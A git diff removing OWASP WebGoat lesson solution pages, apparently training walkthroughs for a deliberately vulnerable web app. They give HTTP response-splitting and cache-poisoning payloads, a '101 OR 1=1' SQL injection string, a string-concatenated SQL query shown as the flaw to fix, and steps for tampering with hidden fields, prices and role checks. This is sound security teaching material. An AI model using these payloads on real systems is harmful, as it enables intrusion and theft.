-the URL in the browser by deleting sections from the end until an unprotected
-directory is found
-
-
-
-
General
-Goal(s):
-
-
Your
-goal should be to try to guess the URL for the "config" interface.
-The "config" URL is only available to the maintenance personnel.
-The application doesn't check for horizontal privileges.
-
-
-
-
-
-
Figure 1 Insecure configuration
-management – Forced Browsing
-
-
-
-
Solution:
-
-
If you want to access a restricted page, you need to
-be able to guess the URI to access the page, for example /admin.
-
-
In this environment, WebGoat consists of different
-servlets that live in the WebGoat application. The main servlet is /attack,
-what could be the servlet for config?
-
-
-
-
Try to access config,
-configuration, conf, ….
-
-
-
-
-
-
Figure 2 No config
-
-
-
-
-
-
Figure 3 No configuration
-
-
-
-
-
-
Figure 4 Bingo for conf
-
-
-
-
This
-could be automated with a tool like Wikto 2.0
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/ForgotPassword.html b/src/main/webapp/lesson_solutions_1/ForgotPassword.html
deleted file mode 100644
index f32e4dd12..000000000
--- a/src/main/webapp/lesson_solutions_1/ForgotPassword.html
+++ /dev/null
@@ -1,828 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Exploit the Forgot Password Page
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
Web
-applications frequently provide their users the ability to retrieve a forgotten
-password. Unfortunately, many web applications fail to implement the mechanism
-properly. The information required to verify the identity of the user is often
-overly simplistic.
-
-
-
-
General
-Goal(s):
-
-
Users can
-retrieve their password if they can answer the secret question properly. There
-is no lock-out mechanism on this 'Forgot Password' page. Your username is
-'webgoat' and your favorite color is 'red'. The goal is to retrieve the
-password of another user.
-
-
-
-
Solution:
-
-
-
-
This lesson
-will show you how easy it is to guess a secret question and retrieve somebody
-else his password.
-
-
-
-
-
-
Figure 1 Lesson 10
-
-
-
-
When you
-enter the user name webgoat and then the answer "red" for your favorite color,
-you will get a password reminder, only not via e-mail.
-
-
-
-
-
-
Figure 2 Submit the answer red
-
-
-
-
-
-
Figure 3 Password reminder for user webgoat
-
-
-
-
The password
-for user webgoat is webgoat. This is a weak password policy, which is also a
-bad thing J
-
-
-
-
Now you need
-to guess the password for another user. The text tells you something about an
-"OWASP admin". So let’s try "admin" for a user name.
-
-
-
-
-
-
Figure 4 Is there a user admin?
-
-
-
-
This works.
-Now you need the guess some colors.
-
-
-
-
-
-
Figure 5 There is a user admin!
-
-
-
-
-
-
Try blue, red
-and green for example.
-
-
-
-
-
-
Figure 6 No blue
-
-
-
-
Blue is an
-incorrect response.
-
-
-
-
-
-
Figure 7 It's green!
-
-
-
-
Green is the
-correct answer and now you know the difficult password for user admin.
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/HiddenFieldTampering.html b/src/main/webapp/lesson_solutions_1/HiddenFieldTampering.html
deleted file mode 100644
index c5c3cf825..000000000
--- a/src/main/webapp/lesson_solutions_1/HiddenFieldTampering.html
+++ /dev/null
@@ -1,685 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Exploit Hidden Fields
-
-
-
-
Concept /
-Topic To Teach:
-
-
Developers
-will use hidden fields for tracking, login, pricing, etc.. information on a
-loaded page. While this is a convenient and easy mechanism for the developer,
-they often don't validate the information that is received from the hidden
-field. This lesson will teach the attacker to find and modify hidden fields to
-obtain a product for a price other than the price specified
-
-
-
-
General
-Goal(s):
-
-
The user
-should be able to exploit a hidden field to obtain a product at an incorrect
-price.
-
-
-
-
-
-
Figure 1 Lesson 4
-
-
-
-
Solution:
-
-
-
-
To change the
-hidden field you need to start your favorite HTTP Interceptor. You can use
-WebScarab from OWASP to intercept the request and change the hidden field.
-Configure your browser to use a local proxy. In Internet Explorer you can do
-this via "Tools" – "Internet Options" – "Connections" – "LAN Settings". You
-must define proxy "localhost" with port 8008.
-
-
-
-
-
-
Figure 2 Set local proxy in Internet Explorer
-
-
-
-
Start
-WebScarab
-
-
-
-
-
-
Figure 3 Intercept request with WebScarab
-
-
-
-
-
-
Figure 4 Change the Price variable to 1
-
-
-
-
-
-
Figure 5 Lesson 4 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/HtmlClues.html b/src/main/webapp/lesson_solutions_1/HtmlClues.html
deleted file mode 100644
index dd907cfb0..000000000
--- a/src/main/webapp/lesson_solutions_1/HtmlClues.html
+++ /dev/null
@@ -1,677 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Discover Clues in the HTML
-
-
-
-
Concept /
-Topic To Teach:
-
-
Developers
-are notorious for leaving statements like FIXME's, Code Broken, Hack, etc...
-inside the source code. Review the source code for any comments
-denoting passowrds, backdoors, or something doesn't work right.
-
-
-
-
General
-Goal(s):
-
-
The user
-should be able to bypass the authentication check.
-
-
-
-
-
-
Figure 1 Lesson 3
-
-
-
-
Right-click
-the page and select "View source"
-
-
-
-
Figure 2 View Source
-
-
-
-
Solution:
-
-
-
-
-
-
Examine the
-HTML source.
-
-
-
-
-
-
-
-
In the HTML
-source there is a comment that contains a user name admin and a password
-adminpw. Enter these values in WebGoat and click "Login"
-
-
-
-
-
-
Figure 3 Enter discovered credentials
-
-
-
-
-
-
Figure 4 Lesson 3 Completed
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/HttpBasics.html b/src/main/webapp/lesson_solutions_1/HttpBasics.html
deleted file mode 100644
index 73bfee09b..000000000
--- a/src/main/webapp/lesson_solutions_1/HttpBasics.html
+++ /dev/null
@@ -1,602 +0,0 @@
-
-
-
-
-
-
-
-Solution: Http Basics
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: Http
-Basics
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-presents the basics for understanding the transfer of data between the browser
-and the web application.
-
-Client Request: How HTTP works:
-
-
All HTTP transactions
-follow the same general format. Each client request and server response has
-three parts: the request or response line, a header section, and the entity
-body. The client initiates a transaction as follows:
-
-The client contacts the server and sends a document request
-
-
- GET /index.html?param=value HTTP/1.0
-
-Next, the client sends optional header information to inform the server of its
-configuration and the document formats it will accept.
-
- User-Agent: Mozilla/4.06 Accept: image/gif,
-image/jpeg, */*
-
-After sending the request and headers, the client may send additional data.
-This data is mostly used by CGI programs using the POST method.
-
-
-
-
General
-Goal(s):
-
-
Enter your
-name in the input field below and press "go" to submit. The server
-will accept the request, reverse the input, and display it back to the user,
-illustrating the basics of handling an HTTP request.
-
-The user should become familiar with the features of WebGoat by manipulating
-the above buttons to view hints and solution. We have to use WebScarab for the first time
-
-
-
-
Solution:
-
-
Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".
-
-
-
-
Figure 1 Intercept Request
-
-
-
-
Fill out your
-name and click the button Go! We get a new WebScarab window, where we can find the parameter person.
-
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/HttpOnly.html b/src/main/webapp/lesson_solutions_1/HttpOnly.html
deleted file mode 100644
index 173622596..000000000
--- a/src/main/webapp/lesson_solutions_1/HttpOnly.html
+++ /dev/null
@@ -1,863 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: HttpOnly Test
-
-
-
-
Concept / Topic To
-Teach:
-
-
-
-
To
-help mitigate the cross site scripting threat, Microsoft has introduced a new cookie
-attribute entitled 'HttpOnly.' If this flag is set, then the browser should not
-allow client-side script to access the cookie. Since the attribute is
-relatively new, several browsers neglect to handle the new attribute properly.
-
-
-
-
General Goal(s):
-
-
The
-purpose of this lesson is to test whether your browser supports the HTTPOnly
-cookie flag. Note the value of the unique2u cookie. If your browser supports
-HTTPOnly, and you enable it for a cookie, client side code should NOT be able
-to read OR write to that cookie, but the browser can still send its value to
-the server. Some browsers only prevent client side read access, but don't
-prevent write access.
-
-
-
-
-
-
Figure 1 Lesson HTTPOnly Test
-
-
-
-
Solution:
-
-
-
-
HTTPOnly
-is not configured. When you click on "Read Cookie" you will get the following
-pop-up in JavaScript, displaying the cookies
-
-
-
-
-
-
Figure 2 All cookies
-
-
-
-
Select
-"Yes" to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in
-WebScarab.
-
-
-
-
-
-
Figure 3 HTTP Request
-
-
-
-
-
-
Figure 4 HTTP Response with HTTPOnly
-cookie
-
-
-
-
-
-
Click
-on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.
-
-
-
-
Figure 5 Only JSESSIONID
-
-
-
-
-
-
Figure 6 HTTPOnly Success
-
-
-
-
Click
-on “Write cookie” which again only shows the JSESSIONID cookie.
-
-
-
-
-
-
Figure 7 JSESSIONID cookie
-
-
-
-
-
-
Figure 8 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/HttpSplitting.html b/src/main/webapp/lesson_solutions_1/HttpSplitting.html
deleted file mode 100644
index 68e0b687d..000000000
--- a/src/main/webapp/lesson_solutions_1/HttpSplitting.html
+++ /dev/null
@@ -1,1019 +0,0 @@
-
-
-
-
-
-
-
-Solution: Http Splitting and Cache Poisoning
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform Http Splitting
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform HTTP Splitting attacks.
-
-
-
-
How the
-attacks works:
-
-
The attacker
-passes malicious code to the web server together with normal input. A victim
-application will not be checking for CR (carriage return, also given by %0d or
-\r) and LF (line feed, also given by %0a or \n)characters. These characters not
-only give attackers control of the remaining headers and body of the response
-the application intends to send, but also allows them to create additional
-responses entirely under their control.
-The effect of an HTTP Splitting attack is maximized when accompanied with a
-Cache Poisoning. The goal of Cache Poisoning attack is to poison the cache of
-the victim by fooling the cache to believe that the page hijacked using the
-HTTP splitting is a good one and it is indeed the server's copy.
-The attack happens using the HTTP Splitting attack plus adding the Last-Modified:
-header and setting it to a future date. This will force the browser to send If-Modified-Since
-request header, which gives the attacker the chance to intercept the server's
-reply and replace it with a '304 Not Modified' reply. A sample of a 304 response
-is:
-HTTP/1.1 304 Not Modified
-Date: Fri, 30 Dec 2005 17:32:47 GMT
-
-
-
-
General
-Goal(s):
-
-
-
-
-This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while
-stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
-Enter a language for the system to search by. You will notice that the
-application is redirecting your request to another resource on the server. You
-should be able to use the CR (%0d) and LF (%0a) to exploit the attack. Your
-exercise should be to force the server to send a 200 OK. If the screen changed
-as an effect to your attack, just go back to the homepage and after stage 2 is
-exploited successfully you will find the green check in the left menu.
-
-
-
-
-
-
-
-
Solution:
-
-
-Please note that this solution is written for Windows. If you use Linux you have to alter it.
-Windows uses a CR and LF for new Line. Linux uses only LF.
-So all the %0d%0a have to be replaced by %0a if you are using Linux.
-
-
-
Because the
-input is not validated you can inject any HTTP syntax, carriage returns and
-line-feed you want.
-
-
-
-
Enter a
-language to examine what's going on. You do have WebScarab intercepting HTTP
-requests and responses?
-
-
-
-
-
-
Figure 1 Language en
-
-
-
-
Figure 2 HTTP Request
-
-
-
-
-
-
Figure 3 First HTTP Response
-
-
-
-
-
-
Figure 4 Second HTTP Request
-
-
-
-
Now inject
-for the language en%0d%0a%0d%0a%0d%0a
-
-
-
-
-
-
Figure 5 First HTTP Request
-
-
-
-
-
-
Figure 6 First HTTP Response
-
-
-
-
The
-Content-Length: 0 will tell the server that the first request is over.
-
-
A 200 OK
-message looks like this: HTTP/1.1 200 OK
-
-
-
-
Lets see what
-you can do with: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked
- J </html>
-
-
-
-
-
-
Figure 7 HTTP Splitting attack
-
-
-
-
-
-
Figure 8 HTTP Response
-
-
-
-
-
-
Figure 9 Second HTTP Request
-
-
-
-
-
-
Figure 10 Second HTTP Response
-
-
-
-
-
-
Figure 11 Hacked!
-
-
-
-
Hit the "Back"
-button of your browser.
-
-
-
-
-
-
Figure 12 Stage 1 completed
-
-
-
-
Now you know
-how to do HTTP Splitting. You can abuse this technique to do a cache poisoning
-attack.
-
-
-
-
Cache
-poisoning requires manipulating the Last-Modified header. This must be changed
-to a date in the future.
-
-
Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked
- J </html>
-
-
-
-
-
-
Figure 13 Inject cache poisoning
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/InsecureLogin.html b/src/main/webapp/lesson_solutions_1/InsecureLogin.html
deleted file mode 100644
index c9abe281d..000000000
--- a/src/main/webapp/lesson_solutions_1/InsecureLogin.html
+++ /dev/null
@@ -1,61 +0,0 @@
-
-
-
-
-Insecure Login
-
-
-
-Lesson Plan Title: Insecure Login
-
-Concept / Topic To Teach:
-Sensitive data should never sent in plaintext!
-Often applications switch to a secure connection after the authorization.
-An attacker could just sniff the login and use the gathered information
-to break into an account. A good webapplication always takes care of
-encrypting sensitive data.
-
-
-General Goal(s):
-See how easy it is to sniff a password in plaintext.
-Understand the advantages of encrypting the login data!
-
-
-Solution:
-This lesson has two stages. In the first stage you try to sniff a password
-which is sent in plaintext. In the second stage you try the same
-but on a secure connection.
-You need a client server setup for this lesson. Please refer
-to the Tomcat Setup in the Introduction section.
-
-Stage 1
-Start a sniffer. If you do not have one we recommend wireshark, which
-is free: Wireshark . Make sure
-you are capturing on the right interface. Click on
-the submit button ans stop the capturing. Now analyze the captured data.
-
-
-
Figure 1: Sniffed Traffic
-
-As you can see we are interested in the HTTP Post request as
-the password is transmitted there. The field for the password has
-the name clear_pass and has as value sniffy. Of course
-this is also the correct answer and you are done with stage 1.
-
-Stage 2
-
-Now you have to switch to a secure connection. You archive this
-by changing the URL from http://... to https://... Sniff again the traffic
-as you have done in stage 1. As you will see there is not sent the password
-in plaintext. The server communicates with the application over a secure layer
-the so called Transport Layer Security (TLS) also called Secure Socket Layer (SSL).
-TLS is a hybrid encrypting protocol. A master secret is built to communicate.
-This master secret is built by using SHA-1 and MD5. All traffic between
-the Server and the Cleint is encrypted.
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/JSONInjection.html b/src/main/webapp/lesson_solutions_1/JSONInjection.html
deleted file mode 100644
index a78a84d25..000000000
--- a/src/main/webapp/lesson_solutions_1/JSONInjection.html
+++ /dev/null
@@ -1,806 +0,0 @@
-
-
-
-
-
-
-
-Solution: JSON Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Perform JSON Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform JSON Injection Attacks.
-
-
-
-
How the
-attacks works:
-
-
JavaScript Object
-Notation (JSON) is a simple and effective lightweight data exchange format.
-JSON can be in a lot of forms such as arrays, lists, hashtables and other data
-structures. JSON is widely used in AJAX and Web2.0 application and is favored
-by programmers over XML because of its ease of use and speed. However, JSON,
-like XML is prone to Injection attacks. A malicious attacker can inject the
-reply from the server and inject some arbitrary values in there.
-
-
-
-
General
-Goal(s):
-
-
You
-are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code
-SEA.
-Once you enter the three digit code of the airport, an AJAX request will be
-executed asking for the ticket price.
-You will notice that there are two flights available, an expensive one with no
-stops and another cheaper one with 2 stops.
-Your goal is to try to get the one with no stops but for a cheaper price.
-
-
-
-
-
-
Figure 1 AJAX Security - JSON Injection
-
-
-
-
Solution:
-
-
Like with the previous lessons you need to manipulate the HTTP Response
-using WebScarab.
-
-
-
-
Examine the normal flow by entering the airport code BOS and SEA and
-intercept the HTTP Request and the HTTP Response in WebScarab.
-
-
-
-
-
-
Figure 2 Intercept HTTP Request
-
-
-
-
-
-
Figure 3 Intercept HTTP Response
-
-
-
-
Change the
-price for the expensive flight of $600 to $100 and click "Accept changes".
-
-
-
-
-
-
-
-
Figure 4 Updated price
-
-
-
-
-
-
Figure 5 Injected result
-
-
-
-
Select the flight
-with no stops and the updated price and click "Submit".
-
-
-
-
-
-
Figure 6 Lesson completed
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/JavaScriptValidation.html b/src/main/webapp/lesson_solutions_1/JavaScriptValidation.html
deleted file mode 100644
index b46f2e402..000000000
--- a/src/main/webapp/lesson_solutions_1/JavaScriptValidation.html
+++ /dev/null
@@ -1,841 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Bypass Client Side JavaScript Validation
-
-
-
-
Concept /
-Topic To Teach:
-
-
Client-side validation
-should not be considered a secure means of validating parameters. This
-validation only helps reducing the amount of server processing time for normal
-users who do not know the format of required input. Attackers can bypass these
-mechanisms easily in various ways. Any client-side validation should be
-duplicated on the server side. This will greatly reduce the likelihood of
-insecure parameter values being used in the application.
-
-
-
-
General
-Goal(s):
-
-
For this
-exercise, the web site requires that you follow certain rules when you fill out
-a form. The user should be able to break those rules, and send the website
-input that it wasn't expecting.
-
-
-
-
-
-
Figure 1 Lesson 6
-
-
-
-
There are two
-ways to complete this lesson. The first one is to submit a valid request like
-the one from the screenshot above and intercept this using WebScarab. The
-second way is to intercept the HTTP Response when loading the page and remove
-the Javascript that validates the values.
-
-
-
-
Solution 1
-
-
-
-
-
-
Figure 2 Intercept request
-
-
-
-
Add different
-symbols to the fields and click "Accept changes".
-
-
-
-
-
-
Figure 3 Change parameters
-
-
-
-
-
-
Figure 4 Lesson 6 Completed
-
-
-
-
Solution 2
-
-
-
-
Reload the
-page by clicking on the menu item "How to bypass Client-Side Javascript
-Validation" and intercept the response in WebScarab.
-
-
-
-
-
-
Figure 5 Enable "Intercept responses"
-
-
-
-
-
-
Figure 6 Intercepted response
-
-
-
-
If you remove
-the onclick="validate();" the "Submit" button will not work anymore.
-
-
Locate the
-validate() Javascript function in the HTML page.
-
-
-
-
-
-
Figure 7 The function validate()
-
-
-
-
Removing the regular
-expressions will remove the Javascript validation and submit the form.
-
-
-
-
-
-
Figure 8 Changed validate() function
-
-
-
-
Click "Accept
-changes". This returns a HTML page like before but without any regular
-expression checks.
-
-
-
-
-
-
Figure 9 It looks the same
-
-
-
-
Change the
-fields in the HTML page to contain symbols like @#@@# and click "Submit".
-
-
-
-
-
-
Figure 10 No more regular expression checks
-
-
-
-
-
-
Figure 11 Lesson 6 Completed
-
-
-
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html
deleted file mode 100644
index 18aa18be9..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Business Layer Access Control.html
+++ /dev/null
@@ -1,50 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage2
-
-
-
-Lesson Plan Title: Role Based Access Control: Stage 2
-
-Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-You have to be sure that the user is AUTHORIZED to do an action! So you have to check for his authorization.
-You have to write some code in the class
-org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java.
-Alter the handleRequest method as there is happening the dispatching.
-There is already a method called isAuthorized which you can use:
-
-
-//***************CODE HERE*************************
-if(!isAuthorized(s, getUserId(s), requestedActionName))
-{
- throw new UnauthorizedException();
-}
-//*************************************************
-
-Try the attack again and you will see that the authorization fails and the
-lesson is completed.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html
deleted file mode 100644
index f6ab88361..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Add Data Layer Access Control.html
+++ /dev/null
@@ -1,56 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage4
-
-
-
-Lesson Plan Title: Role Based Access Control: Stage 4
-
-Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-You have to be sure that the user is AUTHORIZED to do an action and that
-he is authorized to do this action on a certain employee! So you have to check for his authorization.
-You have to write some code in the class
-org.owasp.webgoat.lessons.RoleBasedAccesControl.RoleBasedAccessControl.java.
-Alter the handleRequest method as there is happening the dispatching.
-Action has already a method called isAuthorizedForEmployee which you can use:
-
-
-//***************CODE HERE*************************
-if(!isAuthorized(s, getUserId(s), requestedActionName))
-{
- throw new UnauthorizedException();
-}
-if(!action.isAuthorizedForEmployee(s, getUserId(s), s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)))
-{
- throw new UnauthorizedException();
-}
-//*************************************************
-
-Try the attack again and you will see that the authorization fails and the
-lesson is completed.
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html
deleted file mode 100644
index 004e26185..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Business Layer Access Control.html
+++ /dev/null
@@ -1,48 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage1
-
-
-
-Lesson Plan Title: Role Based Access Control: Stage 1
-
-Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-To solve this exercise you have to know the name of the action, which
-deletes employees. Of course you could just guess
-it because it has a really logical name.
-But we will look it up. So your first step is to log in as John with john as
-password. Use WebScarab to intercept the delete request.
-
-
-
-As you can see the delete action is called DeleteProfile.
-Now log in as Tom. Click in the list on his name and make sure WebScarab
-will intercept the next request. Click on a button, for example the
-'ViewProfile' button. Change in WebScarab the action to DeleteProfile
-and you are done!
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html
deleted file mode 100644
index e94e42c45..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-Solution Lab Role Based Access Control Stage3
-
-
-
-Lesson Plan Title: Role Based Access Control: Stage 3
-
-Concept / Topic To Teach:
-In role-based access control scheme, a role represents
-a set of access permissions and privileges. A user can be
-assigned one or more roles. A role-based access control
-normally consists of two parts: role permission management
-and role assignment. A broken role-based access
-control scheme might allow a user to perform accesses
-that are not allowed by his/her assigned roles, or
-somehow obtain unauthorized roles.
-
-
-General Goal(s):
-Your goal is to explore the access control
-rules that govern this site. Each role has permission to
-certain resources (A-F). Each user is assigned one or more roles.
-Only the user with the [Admin] role should have access
-to the 'F' resources. In a successful attack, a user doesn't
-have the [Admin] role can access resource F.
-
-
-
-Solution:
-In stage 1 we tried to use an action we are not authorised to use.
-In this stage we want to view a profile of an other person. We have the permission
-for the action ViewProfile but we should not have the permission to see a profile
-of another employee!
-
-
-Log in as Tom with tom as password. Click on Tom's name in the list and make sure
-webscarab will intercept the next request. Change the employee_id for example to 101.
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage1.png b/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage1.png
deleted file mode 100644
index a56105599..000000000
Binary files a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage3.png b/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage3.png
deleted file mode 100644
index cfb490dec..000000000
Binary files a/src/main/webapp/lesson_solutions_1/Lab Access Control/images/access_control_stage3.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Numeric SQL Injection.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Numeric SQL Injection.html
deleted file mode 100644
index 3920f2aea..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Numeric SQL Injection.html
+++ /dev/null
@@ -1,41 +0,0 @@
-
-
-
-
-Solution Lab SQL Injection Stage3
-
-
-
-Lesson Plan Title: How to Perform a SQLInjection
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-Solution:
-Choose Larry to log in with password larry. Select yourself from the list
-and make sure that WebScarab will intercept the next request. Replace the id 101 with following:
-
-101 OR 1=1 ORDER BY salary desc
-
With '101 OR 1=1' we have a SQL Statement which is always true. It will
-get all the employees from the db but only return one of them. That is why we have to ensure we get
-the "Big Fish" which is the employee earning most. With 'ORDER BY SALARY DESC' we guarantee exactly this.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html b/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html
deleted file mode 100644
index e09478565..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab SQL Injection/Lab Parameterized Query #1.html
+++ /dev/null
@@ -1,87 +0,0 @@
-
-
-
-
-Solution Lab SQL Injection Stage2
-
-
-
-Lesson Plan Title: How to Perform a SQLInjection
-
-Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven
-site. The methods behind an attack are easy to learn and the damage
-caused can range from considerable to complete system compromise.
-Despite these risks, an incredible number of systems on the internet are
-susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat
-that, with a little common-sense and forethought, can easily be
-prevented.
-
-It is always good practice to sanitize all input data, especially
-data that will used in OS command, scripts, and database queiries, even
-if the threat of SQL injection has been prevented in some other manner.
-
-
-General Goal(s):
-For this exercise, you will perform SQLInjection attacks. You will also
-implement code changes in the web application to defeat these attacks.
-
-Solution:
-To prevent a SQLInjection you can use "Parametreized Queries". This kind of
-query makes it possible to use every input of an user as a parameter.
-In this lesson you have to change org.owasp.webgoat.lessons.SQLInjection.Login.java
-The query execution in the method login looks like this:
-String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
-// System.out.println("Query:" + query);
-try
-{
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- etc...
-
-
-To paramerize the Query you have to replace the userinput with questionmarks:
-String query = "SELECT * FROM employee WHERE userid = ? and password = ?";
-
-
-Now follows the try block with the getConnection method:
-
-try
-{
- Connection connection = WebSession.getConnections(s);
-
-
-The next step is to do a so called "PrepareStatement":
